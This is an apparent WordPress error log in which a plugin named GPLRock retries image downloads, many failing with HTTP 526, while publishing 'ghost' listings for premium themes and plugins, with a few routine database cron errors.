maker-tools-store-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/maker--tools-store-wordpress-theme-13251.webp [04-Apr-2026 22:12:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: maker-tools-store-wordpress-theme [04-Apr-2026 22:12:20 UTC] GPLRock: Image download failed for product coursaty-courses-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:22 UTC] GPLRock: Image download failed for product coursaty-courses-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/coursaty---courses--education-wordpress-theme-4602.webp for product coursaty-courses-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:12:24 UTC] GPLRock: Image download failed for product coursaty-courses-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:26 UTC] GPLRock: Image download failed for product coursaty-courses-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/coursaty---courses--education-wordpress-theme-4602.webp for product coursaty-courses-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:12:28 UTC] GPLRock WARNING: Image download failed for product coursaty-courses-education-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/coursaty---courses--education-wordpress-theme-4602.webp [04-Apr-2026 22:12:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: coursaty-courses-education-wordpress-theme [04-Apr-2026 22:12:28 UTC] GPLRock: Image download failed for product kinesi-physiotherapy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:30 UTC] GPLRock: Image download failed for product kinesi-physiotherapy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kinesi---physiotherapy-wordpress-theme-23901.webp for product kinesi-physiotherapy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:12:33 UTC] GPLRock: Image download failed for product kinesi-physiotherapy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:35 UTC] GPLRock: Image download failed for product kinesi-physiotherapy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kinesi---physiotherapy-wordpress-theme-23901.webp for product kinesi-physiotherapy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:12:37 UTC] GPLRock WARNING: Image download failed for product kinesi-physiotherapy-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kinesi---physiotherapy-wordpress-theme-23901.webp [04-Apr-2026 22:12:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kinesi-physiotherapy-wordpress-theme [04-Apr-2026 22:12:37 UTC] GPLRock: Image download failed for product muana-personal-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:39 UTC] GPLRock: Image download failed for product muana-personal-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/muana---personal-blog--magazine-wordpress-theme-19169.webp for product muana-personal-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:12:42 UTC] GPLRock: Image download failed for product muana-personal-blog-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:44 UTC] GPLRock: Image download failed for product muana-personal-blog-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/muana---personal-blog--magazine-wordpress-theme-19169.webp for product muana-personal-blog-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:12:46 UTC] GPLRock WARNING: Image download failed for product muana-personal-blog-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/muana---personal-blog--magazine-wordpress-theme-19169.webp [04-Apr-2026 22:12:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: muana-personal-blog-magazine-wordpress-theme [04-Apr-2026 22:12:46 UTC] GPLRock: Image downloaded successfully for product laundry-dry-cleaning-services-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f9225074.webp [04-Apr-2026 22:12:46 UTC] GPLRock: Using pre-downloaded image for product laundry-dry-cleaning-services-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f9225074.webp [04-Apr-2026 22:12:46 UTC] GPLRock: Ghost product published with image - Product ID: laundry-dry-cleaning-services-wordpress-theme [04-Apr-2026 22:12:46 UTC] GPLRock: Image download failed for product exgrid-multipurpose-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:48 UTC] GPLRock: Image download failed for product exgrid-multipurpose-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/exgrid---multipurpose-personal-portfolio-wordpress-theme-26890.webp for product exgrid-multipurpose-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:12:50 UTC] GPLRock: Image download failed for product exgrid-multipurpose-personal-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:52 UTC] GPLRock: Image download failed for product exgrid-multipurpose-personal-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/exgrid---multipurpose-personal-portfolio-wordpress-theme-26890.webp for product exgrid-multipurpose-personal-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:12:55 UTC] GPLRock WARNING: Image download failed for product exgrid-multipurpose-personal-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/exgrid---multipurpose-personal-portfolio-wordpress-theme-26890.webp [04-Apr-2026 22:12:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: exgrid-multipurpose-personal-portfolio-wordpress-theme [04-Apr-2026 22:12:55 UTC] GPLRock: Image downloaded successfully for product waymart-multipurpose-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-87d00d64.webp [04-Apr-2026 22:12:55 UTC] GPLRock: Using pre-downloaded image for product waymart-multipurpose-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-87d00d64.webp [04-Apr-2026 22:12:55 UTC] GPLRock: Ghost product published with image - Product ID: waymart-multipurpose-woocommerce-theme [04-Apr-2026 22:12:55 UTC] GPLRock: Image download failed for product wilmr-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:57 UTC] GPLRock: Image download failed for product wilmr-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:12:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wilmr---construction-wordpress-theme-13057.webp for product wilmr-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:12:59 UTC] GPLRock: Image download failed for product wilmr-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:13:01 UTC] GPLRock: Image download failed for product wilmr-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:13:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wilmr---construction-wordpress-theme-13057.webp for product wilmr-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:13:03 UTC] GPLRock WARNING: Image download failed for product wilmr-construction-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/wilmr---construction-wordpress-theme-13057.webp [04-Apr-2026 22:13:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wilmr-construction-wordpress-theme [04-Apr-2026 22:13:03 UTC] GPLRock: Image download failed for product bloxic-furniture-store-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:13:06 UTC] GPLRock: Image download failed for product bloxic-furniture-store-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:13:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bloxic---furniture-store-woocommerce-theme-10811.webp for product bloxic-furniture-store-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:13:08 UTC] GPLRock: Image download failed for product bloxic-furniture-store-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:13:10 UTC] GPLRock: Image download failed for product bloxic-furniture-store-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:13:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bloxic---furniture-store-woocommerce-theme-10811.webp for product bloxic-furniture-store-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:13:12 UTC] GPLRock WARNING: Image download failed for product bloxic-furniture-store-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/bloxic---furniture-store-woocommerce-theme-10811.webp [04-Apr-2026 22:13:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bloxic-furniture-store-woocommerce-theme [04-Apr-2026 22:13:12 UTC] GPLRock: Image download failed for product flatastic-responsive-multipurpose-virtuemart-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:13:14 UTC] GPLRock: Image download failed for product flatastic-responsive-multipurpose-virtuemart-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:13:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flatastic-responsive-multipurpose-virtuemart-theme-9446.webp for product flatastic-responsive-multipurpose-virtuemart-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:13:16 UTC] GPLRock: Image download failed for product flatastic-responsive-multipurpose-virtuemart-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:13:18 UTC] GPLRock: Image download failed for product flatastic-responsive-multipurpose-virtuemart-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:13:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flatastic-responsive-multipurpose-virtuemart-theme-9446.webp for product flatastic-responsive-multipurpose-virtuemart-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 22:13:21 UTC] GPLRock WARNING: Image download failed for product flatastic-responsive-multipurpose-virtuemart-theme. URL: https://meldwp.com/wp-content/uploads/flatastic-responsive-multipurpose-virtuemart-theme-9446.webp [04-Apr-2026 22:13:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flatastic-responsive-multipurpose-virtuemart-theme [04-Apr-2026 22:14:15 UTC] GPLRock: Image downloaded successfully for product array-themes-typable-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f38b34c7.jpg [04-Apr-2026 22:14:15 UTC] GPLRock: Using pre-downloaded image for product array-themes-typable-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f38b34c7.jpg [04-Apr-2026 22:14:15 UTC] GPLRock: Ghost product published with image - Product ID: array-themes-typable-wordpress-theme [04-Apr-2026 22:14:17 UTC] GPLRock: Image downloaded successfully for product ninja-forms-white-label (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-521a1d47.jpg [04-Apr-2026 22:14:17 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-white-label: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-521a1d47.jpg [04-Apr-2026 22:14:17 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-white-label [04-Apr-2026 22:14:18 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-check-payment-gateway (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0f48d114.jpg [04-Apr-2026 22:14:18 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-check-payment-gateway: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0f48d114.jpg [04-Apr-2026 22:14:18 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-check-payment-gateway [04-Apr-2026 22:14:20 UTC] GPLRock: Image downloaded successfully for product searchwp-term-synonyms (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8bb997a6.jpg [04-Apr-2026 22:14:20 UTC] GPLRock: Using pre-downloaded image for product searchwp-term-synonyms: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8bb997a6.jpg [04-Apr-2026 22:14:20 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-term-synonyms [04-Apr-2026 22:14:22 UTC] GPLRock: Image downloaded successfully for product divilife-divi-bars (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d14ba6d5.jpg [04-Apr-2026 22:14:22 UTC] GPLRock: Using pre-downloaded image for product divilife-divi-bars: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d14ba6d5.jpg [04-Apr-2026 22:14:22 UTC] GPLRock: Ghost product published with image - Product ID: divilife-divi-bars [04-Apr-2026 22:14:23 UTC] GPLRock: Image downloaded successfully for product buddypress-boss (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a9b6724b.jpg [04-Apr-2026 22:14:23 UTC] GPLRock: Using pre-downloaded image for product buddypress-boss: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a9b6724b.jpg [04-Apr-2026 22:14:23 UTC] GPLRock: Ghost product published with image - Product ID: buddypress-boss [04-Apr-2026 22:14:25 UTC] GPLRock: Image downloaded successfully for product inovado-retina-responsive-multi-purpose-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4fc065ca.jpg [04-Apr-2026 22:14:25 UTC] GPLRock: Using pre-downloaded image for product inovado-retina-responsive-multi-purpose-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4fc065ca.jpg [04-Apr-2026 22:14:25 UTC] GPLRock: Ghost product published with image - Product ID: inovado-retina-responsive-multi-purpose-theme [04-Apr-2026 22:14:27 UTC] GPLRock: Image downloaded successfully for product cryptico-ico-crypto-landing-cryptocurrency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-43eb377e.jpg [04-Apr-2026 22:14:27 UTC] GPLRock: Using pre-downloaded image for product cryptico-ico-crypto-landing-cryptocurrency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-43eb377e.jpg [04-Apr-2026 22:14:27 UTC] GPLRock: Ghost product published with image - Product ID: cryptico-ico-crypto-landing-cryptocurrency-wordpress-theme [04-Apr-2026 22:14:29 UTC] GPLRock: Image downloaded successfully for product popping-sidebars-and-widgets-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3186d9a3.jpg [04-Apr-2026 22:14:33 UTC] GPLRock: Using pre-downloaded image for product popping-sidebars-and-widgets-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3186d9a3.jpg [04-Apr-2026 22:14:33 UTC] GPLRock: Ghost product published with image - Product ID: popping-sidebars-and-widgets-for-wordpress [04-Apr-2026 22:14:34 UTC] GPLRock: Image downloaded successfully for product studiopress-corporate-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f18bb3ec.jpg [04-Apr-2026 22:14:34 UTC] GPLRock: Using pre-downloaded image for product studiopress-corporate-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f18bb3ec.jpg [04-Apr-2026 22:14:34 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-corporate-pro-genesis-wordpress-theme [04-Apr-2026 22:16:48 UTC] GPLRock: Image downloaded successfully for product themify-builder-woocommerce-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-51dae670.jpg [04-Apr-2026 22:16:48 UTC] GPLRock: Using pre-downloaded image for product themify-builder-woocommerce-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-51dae670.jpg [04-Apr-2026 22:16:48 UTC] GPLRock: Ghost product published with image - Product ID: themify-builder-woocommerce-addon [04-Apr-2026 22:16:50 UTC] GPLRock: Image downloaded successfully for product radio-player-shoutcast-icecast-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-087cef87.jpg [04-Apr-2026 22:16:50 UTC] GPLRock: Using pre-downloaded image for product radio-player-shoutcast-icecast-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-087cef87.jpg [04-Apr-2026 22:16:50 UTC] GPLRock: Ghost product published with image - Product ID: radio-player-shoutcast-icecast-wordpress-plugin [04-Apr-2026 22:16:51 UTC] GPLRock: Image downloaded successfully for product wpdiscuz-comment-search (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0df1756b.jpg [04-Apr-2026 22:16:51 UTC] GPLRock: Using pre-downloaded image for product wpdiscuz-comment-search: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0df1756b.jpg [04-Apr-2026 22:16:51 UTC] GPLRock: Ghost product published with image - Product ID: wpdiscuz-comment-search [04-Apr-2026 22:16:53 UTC] GPLRock: Image downloaded successfully for product coronar-covid-19-informer-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b4b1e7f0.jpg [04-Apr-2026 22:16:53 UTC] GPLRock: Using pre-downloaded image for product coronar-covid-19-informer-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b4b1e7f0.jpg [04-Apr-2026 22:16:53 UTC] GPLRock: Ghost product published with image - Product ID: coronar-covid-19-informer-for-wordpress [04-Apr-2026 22:16:54 UTC] GPLRock: Image downloaded successfully for product themify-builder-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e285552b.jpg [04-Apr-2026 22:16:54 UTC] GPLRock: Using pre-downloaded image for product themify-builder-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e285552b.jpg [04-Apr-2026 22:16:54 UTC] GPLRock: Ghost product published with image - Product ID: themify-builder-pro [04-Apr-2026 22:16:56 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-review-for-discounts-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a6187e85.jpg [04-Apr-2026 22:16:56 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-review-for-discounts-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a6187e85.jpg [04-Apr-2026 22:16:56 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-review-for-discounts-premium [04-Apr-2026 22:16:58 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-zoom-magnifier-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4f8b4dff.jpg [04-Apr-2026 22:16:58 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-zoom-magnifier-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4f8b4dff.jpg [04-Apr-2026 22:16:58 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-zoom-magnifier-premium [04-Apr-2026 22:16:59 UTC] GPLRock: Image downloaded successfully for product themify-thememin-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4b3cada3.jpg [04-Apr-2026 22:16:59 UTC] GPLRock: Using pre-downloaded image for product themify-thememin-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4b3cada3.jpg [04-Apr-2026 22:16:59 UTC] GPLRock: Ghost product published with image - Product ID: themify-thememin-wordpress-theme [04-Apr-2026 22:17:01 UTC] GPLRock: Image downloaded successfully for product themify-suco-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d442b602.jpg [04-Apr-2026 22:17:01 UTC] GPLRock: Using pre-downloaded image for product themify-suco-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d442b602.jpg [04-Apr-2026 22:17:01 UTC] GPLRock: Ghost product published with image - Product ID: themify-suco-wordpress-theme [04-Apr-2026 22:17:03 UTC] GPLRock: Image downloaded successfully for product themify-split-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b62633eb.jpg [04-Apr-2026 22:17:03 UTC] GPLRock: Using pre-downloaded image for product themify-split-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b62633eb.jpg [04-Apr-2026 22:17:03 UTC] GPLRock: Ghost product published with image - Product ID: themify-split-wordpress-theme [04-Apr-2026 22:17:08 UTC] WordPress database error Commands out of sync; you can't run this command now for query SELECT option_name, option_value FROM wpwf_options WHERE option_name IN ('_transient_doing_cron','_transient_timeout_doing_cron') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, get_transient, wp_prime_option_caches [04-Apr-2026 22:17:08 UTC] WordPress database error Commands out of sync; you can't run this command now for query INSERT INTO `wpwf_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_doing_cron', '1775341028.5154609680175781250000', 'on') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, _wp_cron, spawn_cron, set_transient, add_option [04-Apr-2026 22:18:42 UTC] GPLRock: Image downloaded successfully for product abolire-single-property-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-877aa087.jpg [04-Apr-2026 22:18:42 UTC] GPLRock: Using pre-downloaded image for product abolire-single-property-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-877aa087.jpg [04-Apr-2026 22:18:42 UTC] GPLRock: Ghost product published with image - Product ID: abolire-single-property-wordpress-theme [04-Apr-2026 22:18:44 UTC] GPLRock: Image downloaded successfully for product 1040-night-club-dj-music-festival-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ecb0c5d7.jpg [04-Apr-2026 22:18:44 UTC] GPLRock: Using pre-downloaded image for product 1040-night-club-dj-music-festival-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ecb0c5d7.jpg [04-Apr-2026 22:18:44 UTC] GPLRock: Ghost product published with image - Product ID: 1040-night-club-dj-music-festival-wordpress-theme [04-Apr-2026 22:18:45 UTC] GPLRock: Image downloaded successfully for product yacht-and-boat-rental-service-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b2b36670.jpg [04-Apr-2026 22:18:45 UTC] GPLRock: Using pre-downloaded image for product yacht-and-boat-rental-service-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b2b36670.jpg [04-Apr-2026 22:18:45 UTC] GPLRock: Ghost product published with image - Product ID: yacht-and-boat-rental-service-wordpress-theme [04-Apr-2026 22:18:47 UTC] GPLRock: Image downloaded successfully for product call-to-action-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e5d3743f.jpg [04-Apr-2026 22:18:47 UTC] GPLRock: Using pre-downloaded image for product call-to-action-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e5d3743f.jpg [04-Apr-2026 22:18:47 UTC] GPLRock: Ghost product published with image - Product ID: call-to-action-for-amp [04-Apr-2026 22:18:49 UTC] GPLRock: Image downloaded successfully for product baby-kids-education-primary-school-children (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9c9c9a84.jpg [04-Apr-2026 22:18:49 UTC] GPLRock: Using pre-downloaded image for product baby-kids-education-primary-school-children: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9c9c9a84.jpg [04-Apr-2026 22:18:49 UTC] GPLRock: Ghost product published with image - Product ID: baby-kids-education-primary-school-children [04-Apr-2026 22:18:50 UTC] GPLRock: Image downloaded successfully for product cloudme-host-wordpress-hosting-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c2874480.jpg [04-Apr-2026 22:18:50 UTC] GPLRock: Using pre-downloaded image for product cloudme-host-wordpress-hosting-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c2874480.jpg [04-Apr-2026 22:18:50 UTC] GPLRock: Ghost product published with image - Product ID: cloudme-host-wordpress-hosting-theme [04-Apr-2026 22:18:52 UTC] GPLRock: Image downloaded successfully for product daiquiri-bartender-services-catering-cocktail-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2bb8ccc1.jpg [04-Apr-2026 22:18:52 UTC] GPLRock: Using pre-downloaded image for product daiquiri-bartender-services-catering-cocktail-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2bb8ccc1.jpg [04-Apr-2026 22:18:52 UTC] GPLRock: Ghost product published with image - Product ID: daiquiri-bartender-services-catering-cocktail-wordpress-theme [04-Apr-2026 22:18:53 UTC] GPLRock: Image downloaded successfully for product diveit-scuba-diving-school-sea-adventure-travel-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8de8a82a.jpg [04-Apr-2026 22:18:53 UTC] GPLRock: Using pre-downloaded image for product diveit-scuba-diving-school-sea-adventure-travel-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-8de8a82a.jpg [04-Apr-2026 22:18:53 UTC] GPLRock: Ghost product published with image - Product ID: diveit-scuba-diving-school-sea-adventure-travel-wordpress-theme [04-Apr-2026 22:18:55 UTC] GPLRock: Image downloaded successfully for product pressgrid-frontend-publish-reaction-multimedia (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-63e44105.jpg [04-Apr-2026 22:18:55 UTC] GPLRock: Using pre-downloaded image for product pressgrid-frontend-publish-reaction-multimedia: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-63e44105.jpg [04-Apr-2026 22:18:55 UTC] GPLRock: Ghost product published with image - Product ID: pressgrid-frontend-publish-reaction-multimedia [04-Apr-2026 22:18:57 UTC] GPLRock: Image downloaded successfully for product bigger-construction-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b2d79812.jpg [04-Apr-2026 22:18:57 UTC] GPLRock: Using pre-downloaded image for product bigger-construction-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b2d79812.jpg [04-Apr-2026 22:18:57 UTC] GPLRock: Ghost product published with image - Product ID: bigger-construction-wordpress-theme [04-Apr-2026 22:20:45 UTC] GPLRock: Image download failed for product image-magnify-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:20:47 UTC] GPLRock: Image download failed for product image-magnify-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 22:20:49 UTC] GPLRock 